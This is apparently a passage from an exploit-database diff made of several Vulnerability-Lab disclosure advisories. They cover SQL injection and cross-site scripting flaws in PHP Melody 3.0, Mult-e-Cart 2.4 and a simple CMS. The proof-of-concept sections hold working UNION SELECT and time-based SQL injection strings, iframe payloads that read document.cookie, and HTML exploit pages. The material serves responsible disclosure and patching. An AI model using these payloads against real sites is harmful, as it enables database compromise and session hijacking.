Successful exploitation of the remote sql injection results in database management system, web-server and web-application compromise.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] newUser
[+] editUser
Vulnerable File(s):
[+] admin.php?act=users
Vulnerable Input(s):
[+] Name
[+] Username
[+] Password
Vulnerable Parameter(s):
[+] name
[+] username
[+] password
Affected Module(s):
[+] Users (act=users) (Backend)
Proof of Concept (PoC):
=======================
The remote sql-injection web vulnerability can be exploited by remote attackers with privileged account and without user interaction.
For security demonstration or to reproduce the sql injection vulnerability follow the provided information and steps below to continue.
PoC: Example
act=addUser&name=[ADD EXISITING DEFAULT VALUE!]&email=test@test.de&username=[ADD EXISITING DEFAULT VALUE!]&password=[ADD EXISITING DEFAULT VALUE!]&submit=Add User
PoC: Exploitation
act=addUser&name=[ADD EXISITING DEFAULT VALUE]-[SQL-INJECTION!]'&email=test@test.de&username=[ADD EXISITING DEFAULT VALUE]-[SQL-INJECTION!]'&password=a-1'&submit=Add User
--- PoC Session Logs (POST) ---
https://simple-cms.localhost:8000/simplecms/admin.php
Host: simple-cms.localhost:8000
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: https://simple-cms.localhost:8000/simplecms/admin.php?act=newUser
Content-Type: application/x-www-form-urlencoded
Content-Length: 132
Origin: https://simple-cms.localhost:8000
Connection: keep-alive
Cookie: PHPSESSID=9smae9mm1m1misttrp1a2e1p23
act=addUser&name=[ADD EXISITING DEFAULT VALUE]-[SQL-INJECTION!]'&email=test@test.de&username=[ADD EXISITING DEFAULT VALUE]-[SQL-INJECTION!]'&password=[ADD EXISITING DEFAULT VALUE]-[SQL-INJECTION!]'&submit=Add User
-
POST: HTTP/2.0 200 OK
server: Apache
content-length: 1224
content-type: text/html; charset=UTF-8
--- SQL Error Exception Logs ---
Error: SELECT * FROM cms2_users WHERE username='a%20-1'
Error: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '%20-1'' at line 1
Solution - Fix & Patch:
=======================
1. Disallow sql-errors to be displayed in the frontend and backend. Disable to redisplay the broken or malicious query on client-side.
2. Use prepared statement to protect the sql query of the post method request
3. Restrict the post parameters by disallow the usage of special chars with single or double quotes
4. Setup a filter or validation class to deny broken or manipulated sql queries
Credits & Authors:
==================
Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com
Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.
Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY (VULNERABILITY LAB)
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE
LUDWIG-ERHARD STRAßE 4
34131 KASSEL - HESSEN
DEUTSCHLAND (DE)

282
exploits/php/webapps/50486.txt Normal file
View file

@ -0,0 +1,282 @@
# Exploit Title: PHP Melody 3.0 - 'Multiple' Cross-Site Scripting (XSS)
# Date: 2021-10-20
# Exploit Author: Vulnerability Lab
# Vendor Homepage: https://www.phpsugar.com/phpmelody.html
# Version: v3
# Tested on: Linux
Document Title:
===============
PHP Melody v3.0 - Multiple Cross Site Web Vulnerabilities
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2290
Bulletin: https://www.phpsugar.com/blog/2021/09/php-melody-3-0-vulnerability-report-fix/
Release Date:
=============
2021-10-20
Vulnerability Laboratory ID (VL-ID):
====================================
2290
Common Vulnerability Scoring System:
====================================
5
Vulnerability Class:
====================
Cross Site Scripting - Non Persistent
Current Estimated Price:
========================
500€ - 1.000€
Product & Service Introduction:
===============================
Upload, import, stream or embed any media. The smart way to manage audio & video. Comes with all the tools you need for online publishing.
Beautiful content for your site. Allow users to create their channels, subscribe and follow the content they like. Podcast, mini-series,
TV shows or movies. Everything is easier to publish with our CMS. Invest in a Secure Foundation. Build with a proven CMS.
(Copy of the Homepage: https://www.phpsugar.com/phpmelody.html )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple non-persistent cross site scripting vulnerabilities in the PHP Melody v3.0 video cms web-application.
Affected Product(s):
====================
PHPSUGAR
Product: PHP Melody v3.0 - Video CMS (Web-Application)
Vulnerability Disclosure Timeline:
==================================
2021-09-01: Researcher Notification & Coordination (Security Researcher)
2021-09-02: Vendor Notification (Security Department)
2021-09-04: Vendor Response/Feedback (Security Department)
2021-09-22: Vendor Fix/Patch (Service Developer Team)
2021-09-22: Security Acknowledgements (Security Department)
2021-10-20: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Authentication Type:
====================
Pre Auth (No Privileges or Session)
User Interaction:
=================
Low User Interaction
Disclosure Type:
================
Responsible Disclosure
Technical Details & Description:
================================
Multiple non-persistent cross site web vulnerabilities has been discovered in the official PHP Melody v3.0 video cms web-application.
The vulnerability allows remote attackers to inject own malicious script codes with non-persistent attack vector to compromise browser
to web-application requests by the client-side.
The cross site scripting vulnerabilities are located in the `moved`, `username` and `keyword` parameters of the `categories.php`, `import.php`
or `import-user.php` files. The injection point is located in the get method request and the execution occurs with non-persistent attack vector
in the status message or exception of the admin panel ui.
Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing attacks, non-persistent external redirects
to malicious source and non-persistent manipulation of affected application modules.
Request Method(s):
[+] GET
Vulnerable File(s):
[+] categories.php
[+] import-user.php
[+] import.php
Vulnerable Parameter(s):
[+] move
[+] username
[+] keyword
Affected Module(s):
[+] Status Message & Exception
Proof of Concept (PoC):
=======================
The client-side cross site scripting web vulnerabilities can be exploited by remote attackers without account and with low user interaction.
For security demonstration or to reproduce the cross site web vulnerability follow the provided information and steps below to continue.
PoC: Payload
%22%3E%3Ciframe%20src=a%20onload=alert(document.cookie)%3E
PoC: Exploitation
https://phpmelody.localhost.com:8080/admin/categories.php?type=genre&id=1&moved=%22%3E%3Ciframe%20src=a%20onload=alert(document.cookie)%3E
-
https://phpmelody.localhost.com:8080/admin/import-user.php?action=search&username=%22%3E%3Ciframe%20src=evil.source%20onload=alert(document.cookie)%3E
&results=50&autofilling=0&autodata=1&oc=1&utc=19&data_source=youtube&sub_id=24&page=1
-
https://phpmelody.localhost.com:8080/admin/import.php?action=search&keyword=%22%3E%3Ciframe%20src=evil.source%20onload=alert(document.cookie)%3E&results=50&page=1&autofilling=0&autodata=1&oc=1&utc=7&search_category=Comedy&search_orderby=relevance&data_source=youtube&sub_id=4
PoC: Exploit
<html>
<head><body>
<title>PHP Melody v3.0 - XSS PoC Exploit</title>
#1
<iframe src="https://phpmelody.localhost.com:8080/admin/categories.php?type=genre&id=1&moved=%22%3E%3Ciframe%20src=a%20onload=alert(document.cookie)%3E" width="200" height="200"> </iframe>
#2
<iframe src="https://phpmelody.localhost.com:8080/admin/import-user.php?action=search&username=%22%3E%3Ciframe%20src=evil.source%20onload=alert(document.cookie)%3E" width="200" height="200">
&results=50&autofilling=0&autodata=1&oc=1&utc=19&data_source=youtube&sub_id=24&page=1 </iframe>
#3
<iframe src="https://phpmelody.localhost.com:8080/admin/import.php?action=search&keyword=%22%3E%3Ciframe%20src=evil.source%20onload=alert(document.cookie)%3E" width="200" height="200">&results=50&page=1&autofilling=0&autodata=1&oc=1&utc=7&search_category=Comedy&search_orderby=relevance&data_source=youtube&sub_id=4 </iframe>
</body></head>
</html>
--- PoC Session Logs (GET) (move) ---
https://phpmelody.localhost.com:8080/admin/categories.php?type=genre&id=1&moved="><iframe src=evil.source onload=alert(document.cookie)>
Host: phpmelody.localhost.com:8080
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
Cookie: PHPSESSID=acf50832ffd23b7d11815fa2b8f2e17u;
melody_d900e07810ba03257e53baf46a9ada6f=admin; melody_key_d900e07810ba03257e53baf46a9ada6f=cc33e6eb60d2c1e31a5612bd8c193c88;
cookieconsent_dismissed=yes; sidebar-main-state=maxi; watched_video_list=MSw0LDUsNywy;
pm_elastic_player=normal; aa_import_from=youtube; guest_name_d900e07810ba03257e53baf46a9ada6f=admin
-
GET: HTTP/2.0 200 OK
content-type: text/html; charset=utf-8
x-powered-by: PHP/5.4.34
--- PoC Session Logs (GET) (username) ---
https://phpmelody.localhost:8080/admin/import-user.php?action=search&username="><iframe src=evil.source onload=alert(document.cookie)>&results=50&autofilling=0&autodata=1&oc=1&utc=19&data_source=youtube&sub_id=24&page=1
Host: phpmelody.localhost:8080
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
Cookie: PHPSESSID=acf50832ffd23b7d11815fa2b8f2e17u;
melody_d900e07810ba03257e53baf46a9ada6f=admin; melody_key_d900e07810ba03257e53baf46a9ada6f=cc33e6eb60d2c1e31a5612bd8c193c88;
cookieconsent_dismissed=yes; sidebar-main-state=maxi; watched_video_list=MSw0LDUsNywy;
pm_elastic_player=normal; aa_import_from=youtube; guest_name_d900e07810ba03257e53baf46a9ada6f=admin
-
GET: HTTP/2.0 200 OK
content-type: text/html; charset=utf-8
x-powered-by: PHP/5.4.34
Vulnerable Source: Categories.php (type=genre&id=1&moved)
<div class="alert alert-success alert-styled-left"><button type="button" class="close" data-dismiss="alert"
aria-label="Close"><span aria-hidden="true">×</span></button>
Category<strong>Film & animation</strong> moved "><iframe src="evil.source" onload="alert(document.cookie)"> a level.</div>
<div id="display_result" style="display:none;"></div>
Vulnerable Source: Import Videos from User (action=search&username)
<div class="card">
<div class="card-body">
<h5 class="mb-3">Username</h5>
<div class="d-block">
<form name="import-user-search-form" id="import-user-search-form" action="" method="post" class="">
<div class="input-group mb-3">
<div class="form-group-feedback form-group-feedback-left">
<input name="username" type="text" class="form-control form-control-lg alpha-grey gautocomplete" value=""><iframe src="evil.source" onload="alert(document.cookie)">"
placeholder="Enter username or Channel ID" autocomplete="yt-username" />
<div class="form-control-feedback form-control-feedback-lg">
<i class="icon-search4 text-muted"></i>
</div></div>
<div class="input-group-append">
<select name="data_source" class="form-field alpha-grey custom-select custom-select-lg">
<option value="youtube" selected="selected">Youtube User</option>
<option value="youtube-channel" >Youtube Channel</option>
<option value="dailymotion" >Dailymotion User</option>
<option value="vimeo" >Vimeo User</option>
</select></div>
<div class="input-group-append">
<button type="submit" name="submit" class="btn btn-primary btn-lg" id="search-user-btn">Search</button>
</div></div>
Reference(s):
https://phpmelody.localhost.com:8080/admin/
https://phpmelody.localhost.com:8080/admin/import.php
https://phpmelody.localhost.com:8080/admin/categories.php
https://phpmelody.localhost.com:8080/admin/import-user.php
Solution - Fix & Patch:
=======================
The vulnerabilities can be resolved by the following steps ...
1. Encode, escape or filter the vulnerable move, keyword and username parameters in the get method requests
2. Restrict all the transmitted parameters by disallowing the usage of special chars
3. Sanitize the status message and error message output to prevent the execution points
4. Alternativ setup security headers and a web firewall or filter to prevent further exploitation
Credits & Authors:
==================
Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com
Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.
Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY (VULNERABILITY LAB)
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE
LUDWIG-ERHARD STRAßE 4
34131 KASSEL - HESSEN
DEUTSCHLAND (DE)

214
exploits/php/webapps/50487.txt Normal file
View file

@ -0,0 +1,214 @@
# Exploit Title: PHP Melody 3.0 - 'vid' SQL Injection
# Date: 2021-10-20
# Exploit Author: Vulnerability Lab
# Vendor Homepage: https://www.phpsugar.com/phpmelody.html
# Version: v3
Document Title:
===============
PHP Melody v3.0 - (vid) SQL Injection Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2295
Bulletin: https://www.phpsugar.com/blog/2021/09/php-melody-3-0-vulnerability-report-fix/
Release Date:
=============
2021-10-20
Vulnerability Laboratory ID (VL-ID):
====================================
2295
Common Vulnerability Scoring System:
====================================
7
Vulnerability Class:
====================
SQL Injection
Current Estimated Price:
========================
1.000€ - 2.000€
Product & Service Introduction:
===============================
Upload, import, stream or embed any media. The smart way to manage audio & video. Comes with all the tools you need for online publishing.
Beautiful content for your site. Allow users to create their channels, subscribe and follow the content they like. Podcast, mini-series,
TV shows or movies. Everything is easier to publish with our CMS. Invest in a Secure Foundation. Build with a proven CMS.
(Copy of the Homepage: https://www.phpsugar.com/phpmelody.html )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a remote sql-injection web vulnerability in the PHP Melody v3.0 video cms web-application.
Affected Product(s):
====================
PHPSUGAR
Product: PHP Melody v3.0 - Video CMS (Web-Application)
Vulnerability Disclosure Timeline:
==================================
2021-09-01: Researcher Notification & Coordination (Security Researcher)
2021-09-02: Vendor Notification (Security Department)
2021-09-04: Vendor Response/Feedback (Security Department)
2021-09-22: Vendor Fix/Patch (Service Developer Team)
2021-09-22: Security Acknowledgements (Security Department)
2021-10-20: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Authentication Type:
====================
Full Authentication (Admin/Root Privileges)
User Interaction:
=================
No User Interaction
Disclosure Type:
================
Responsible Disclosure
Technical Details & Description:
================================
A remote sql-injection vulnerability has been discovered in the PHP Melody v3.0 video cms web-application.
The vulnerability allows remote attackers to inject or execute own sql commands to compromise the dbms or
file system of the web-application.
The remote sql injection vulnerability is located in the `vid` parameter of the `edit-video.php` file.
Remote attackers with moderator or admin access privileges are able to execute own malicious sql commands
by inject get method request. The vid parameter in the acp ui is not sanitized properly. Thus allows an
attacker to inject own sql commands to compromise the web-application and dbms.
Exploitation of the remote sql injection vulnerability requires no user interaction but a privileged moderator or admin account.
Successful exploitation of the remote sql injection results in database management system, web-server and web-application compromise.
Request Method(s):
[+] GET
Vulnerable Module(s):
[+] Video Edit
Vulnerable File(s):
[+] edit-video.php
Vulnerable Parameter(s):
[+] vid
Proof of Concept (PoC):
=======================
The remote sql-injection web vulnerability can be exploited by authenticated remote attackers without user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
Original:
https://phpmelody.localhost:8000/admin/edit-video.php?vid=3435b47dd&a=4&page=1&filter=added&fv=desc
PoC: Exploitation #1
https://phpmelody.localhost:8000/admin/edit-video.php?vid=-3435b47dd' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,
CONCAT(0x7171766b71,0x5642646a536b77547366574a4c43577866565270554f56426b6175535a55764259514b6c486e6e69,0x71626a6271),
NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
PoC: Exploitation #2
https://phpmelody.localhost:8000/admin/edit-video.php?vid=3435b47dd-' AND (SELECT 1446 FROM (SELECT(SLEEP([SLEEPTIME])))--
PoC: Exploit
<html>
<head><body>
<title>phpmelody vid sql injection poc</title>
<iframe src="https://phpmelody.localhost:8000/admin/edit-video.php?vid=-3435b47dd' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,
CONCAT(0x7171766b71,0x5642646a536b77547366574a4c43577866565270554f56426b6175535a55764259514b6c486e6e69,0x71626a6271),
NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--">
<br>
<iframe src="https://phpmelody.localhost:8000/admin/edit-video.php?vid=3435b47dd-' AND (SELECT 1446 FROM (SELECT(SLEEP([SLEEPTIME])))--">
</body></head>
</html>
Reference(s):
https://phpmelody.localhost:8000/
https://phpmelody.localhost:8000/admin/
https://phpmelody.localhost:8000/admin/edit-video.php
Solution - Fix & Patch:
=======================
The vulnerability can be resolved by the following steps ...
1. Use a prepared statement to build the query
2. Restrict the parameter input to disallow special chars
3. Escape and encode the content to prevent execution of malicious payloads
4. Alternativ it is possible to integrate a web firewall or filter class to block further attacks.
Credits & Authors:
==================
Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com
Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.
Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY (VULNERABILITY LAB)
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE
LUDWIG-ERHARD STRAßE 4
34131 KASSEL - HESSEN
DEUTSCHLAND (DE)

214
exploits/php/webapps/50488.txt Normal file
View file

@ -0,0 +1,214 @@
# Exploit Title: PHP Melody 3.0 - Persistent Cross-Site Scripting (XSS)
# Date: 2021-10-21
# Exploit Author: Vulnerability Lab
# Vendor Homepage: https://www.phpsugar.com/phpmelody.html
Document Title:
===============
PHP Melody v3.0 - (Editor) Persistent XSS Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2291
Bulletin: https://www.phpsugar.com/blog/2021/09/php-melody-3-0-vulnerability-report-fix/
Release Date:
=============
2021-10-21
Vulnerability Laboratory ID (VL-ID):
====================================
2291
Common Vulnerability Scoring System:
====================================
5.4
Vulnerability Class:
====================
Cross Site Scripting - Persistent
Current Estimated Price:
========================
500€ - 1.000€
Product & Service Introduction:
===============================
Upload, import, stream or embed any media. The smart way to manage audio & video. Comes with all the tools you need for online publishing.
Beautiful content for your site. Allow users to create their channels, subscribe and follow the content they like. Podcast, mini-series,
TV shows or movies. Everything is easier to publish with our CMS. Invest in a Secure Foundation. Build with a proven CMS.
(Copy of the Homepage: https://www.phpsugar.com/phpmelody.html )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a persistent cross site web vulnerability in the PHP Melody v3.0 video cms web-application.
Affected Product(s):
====================
PHPSUGAR
Product: PHP Melody v3.0 - Video CMS (Web-Application)
Vulnerability Disclosure Timeline:
==================================
2021-09-01: Researcher Notification & Coordination (Security Researcher)
2021-09-02: Vendor Notification (Security Department)
2021-09-04: Vendor Response/Feedback (Security Department)
2021-09-22: Vendor Fix/Patch (Service Developer Team)
2021-09-22: Security Acknowledgements (Security Department)
2021-10-20: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Authentication Type:
====================
Restricted Authentication (Moderator Privileges)
User Interaction:
=================
Low User Interaction
Disclosure Type:
================
Responsible Disclosure
Technical Details & Description:
================================
A persistent input validation web vulnerability has been discovered in PHP Melody v3.0 video cms web-application.
The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to
compromise browser to web-application requests from the application-side.
The persistent cross site web vulnerability is located in the video editor (WYSIWYG) with the tinymce class.
Privileged user accounts like edtiors are able to inject own malicious script code via editor to provoke a
public execution by users oder administrators. The request method to inject is get and after save in dbms
via post method the attack vector becomes persistent.
Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent
external redirects to malicious source and persistent manipulation of affected application modules.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] Editor - Videos (WYSIWYG - tinymce)
Vulnerable File(s):
[+] edit-episode.php
Vulnerable Parameter(s):
[+] episode_id
Affected Module(s):
[+] description
Proof of Concept (PoC):
=======================
The persistent validation vulnerability can be exploited by remote attackers with privileged editor user account and with low user interaction.
For security demonstration or to reproduce the web vulnerability follow the provided information and steps below to continue.
PoC: Payload
<p><a title=""><iframe src="//phpmelody.localhost.com:8080/admin/[PWND]">">">"
href="https://phpmelody.localhost.com:8080/admin/"><iframe%20src=evil.source onload=alert(document.cookie)>">">">">"></iframe></a></p>
--- PoC Session Logss (GET) [WYSIWYG] ---
https://phpmelody.localhost.com:8080/admin/[PWND]
Host: phpmelody.localhost.com:8080
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
Referer: https://phpmelody.localhost.com:8080/admin/edit-episode.php?episode_id=1
Cookie: PHPSESSID=aac20732ffd23b7d11815fa2b8f2e12a; melody_d900e07810ba03257e53baf46a9ada6f=admin;
melody_key_d900e07810ba03257e53baf46a9ada6f=cc33e6eb60d2c1e31a5612bd8c193c88;
cookieconsent_dismissed=yes; sidebar-main-state=maxi; watched_video_list=MSw0LDUsNw%3D%3D;
pm_elastic_player=normal; aa_import_from=youtube; guest_name_d900e07810ba03257e53baf46a9ada6f=admin
-
GET: HTTP/2.0 200 OK
content-type: text/html;
vary: Accept-Encoding
Vulnerable Source: Video Editor (WYSIWYG - tinymce)
<textarea name="description" cols="100" id="textarea-WYSIWYG" class="tinymce" style="display: none;"
aria-hidden="true"><p><test title=""><iframe src="//phpmelody.localhost.com:8080/admin/evil.source">">">"
href="https://phpmelody.localhost.com:8080/admin/"><iframe%20src=evil.source onload=alert(document.cookie)>">">">">"></iframe></a></p></textarea>
<span class="autosave-message"></span>
</div></div>
Reference(s):
https://phpmelody.localhost.com:8080/admin/
https://phpmelody.localhost.com:8080/admin/edit-episode.php
https://phpmelody.localhost.com:8080/admin/edit-episode.php?episode_id=1
Solution - Fix & Patch:
=======================
Encode and sanitize the input description parameter of the web editor tinymce class for moderators, editors or users to prevent attacks.
Credits & Authors:
==================
Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com
Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.
Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY (VULNERABILITY LAB)
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE
LUDWIG-ERHARD STRAßE 4
34131 KASSEL - HESSEN
DEUTSCHLAND (DE)

264
exploits/php/webapps/50489.txt Normal file
View file

@ -0,0 +1,264 @@
# Exploit Title: Mult-e-Cart Ultimate 2.4 - 'id' SQL Injection
# Date: 2021-10-22
# Exploit Author: Vulnerability Lab
# Vendor Homepage: https://multecart.com/
# Version: 2.4
Document Title:
===============
Mult-e-Cart Ultimate v2.4 - SQL Injection Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2306
Release Date:
=============
2021-10-22
Vulnerability Laboratory ID (VL-ID):
====================================
2306
Common Vulnerability Scoring System:
====================================
7
Vulnerability Class:
====================
SQL Injection
Current Estimated Price:
========================
1.000€ - 2.000€
Product & Service Introduction:
===============================
Digital Multivendor Marketplace Online Store - eShop CMS
(Source: https://ultimate.multecart.com/ & https://www.techraft.in/ )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple sql-injection web vulnerabilities in the Mult-e-Cart Ultimate v2.4 (v2021) web-application.
Affected Product(s):
====================
Techraft
Product: Digital Multivendor Marketplace Online Store v2.4 - eShop CMS (Web-Application)
Vulnerability Disclosure Timeline:
==================================
2021-10-22: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Authentication Type:
====================
Restricted Authentication (Moderator Privileges)
User Interaction:
=================
No User Interaction
Disclosure Type:
================
Independent Security Research
Technical Details & Description:
================================
Multiple classic sql-injection web vulnerabilities has been discovered in the Mult-e-Cart Ultimate v2.4 (v2021) web-application.
The web vulnerability allows remote attackers to inject or execute own sql commands to compromise the database management system.
The vulnerabilities are located in the `id` parameter of the `view` and `update` function. The vulnerable modules are `inventory`,
`customer`, `vendor` and `order`. Remote attackers with a vendor shop account are able to exploit the vulnerable id parameter to
execute malicious sql commands. The request method to inject is get and the attack vector is located on the client-side. The remote
vulnerability is a classic order by sql-injection. The issue is exploitable with one of the two vendor roles or higher privileged
roles like admin.
Exploitation of the remote sql injection vulnerabilities requires no user interaction and a privileged vendor- or admin role user account.
Successful exploitation of the remote sql injection results in database management system, web-server and web-application compromise.
Request Method(s):
[+] GET
Vulnerable Module(s):
[+] inventory/inventory/update
[+] /customer/customer/view
[+] /vendor/vendor/view
[+] /order/sub-order/view-order
Vulnerable Parameter(s):
[+] id
Proof of Concept (PoC):
=======================
The remote sql injection web vulnerabilities can be exploited by remote attackers with privileged backend panel access without user interaction.
For security demonstration or to reproduce the remote sql-injection web vulnerability follow the provided information and steps below to continue.
PoC: Payloads
1' union select 1,2,3,4,@@version--&edit=t
1' union select 1,2,3,4,@@database--&edit=t
PoC: Exploitation
https://multecartultimate.localhost:8080/inventory/inventory/update?id=1' union select 1,2,3,4,5--&edit=t
https://multecartultimate.localhost:8080/customer/customer/view?id=1' union select 1,2,3,4,5--&edit=t
https://multecartultimate.localhost:8080/vendor/vendor/view?id=1' union select 1,2,3,4,5--&edit=t
